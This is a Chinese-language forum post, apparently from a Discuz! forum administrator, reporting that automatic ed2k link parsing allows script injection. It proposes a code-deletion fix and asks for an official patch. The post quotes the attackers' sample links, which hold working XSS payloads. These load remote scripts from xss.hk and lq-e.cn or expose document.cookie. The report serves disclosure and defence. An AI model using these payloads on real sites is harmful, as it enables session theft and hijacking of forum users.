电驴链接导致的漏洞

有网友反映帖子有弹窗，我就看了一下，原来是自动解析电驴链接导致的，不过，我到后台看了，回帖的用户是禁止使用html的，不知道为啥，电驴链接会自动解析。我已暂时按照其他网站的修改方法修改了论坛文件，但是我觉得这是个漏洞，请官方能给一个好的方法解决。
修改文件你论坛根目录下source\function\function_discuzcode.php
找到
if($allowbbcode) {
if(strpos($msglower, 'ed2k://') !== FALSE) {[/font]
$message = preg_replace("/ed2k:\/\/(.+?)\//e", "parseed2k('\\1')", $message);
}
}
删除保存。


网友贴了好几个链接，我也不知道是哪一个，请去我网站看看。谢谢。
链接示例：
test (0 Bytes)/www.lq-e.cn/1.js></script>+'|test/
test (0 Bytes)script>+'|test/
test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.hk%2FyroSom%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>+'|test/

test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)test (0 Bytes)
test (0 Bytes)e*d2k://|file|test|'+alert(坛)+'|test/e*d2k://|file|test|'+alert(存)+'|test/e*d2k://|file|test|'+alert(在)+'|test/e*d2k://|file|test|'+alert(漏)+'|test/e*d2k://|file|test|'+alert(洞)+'|test/

ed2k://|xxx|xxx|'+alert(document.cookie)+'|xxx/
test (0 Bytes)/xss.hk/yroSom?1396499031></script>+'|test/
test (0 Bytes)

test (0 Bytes)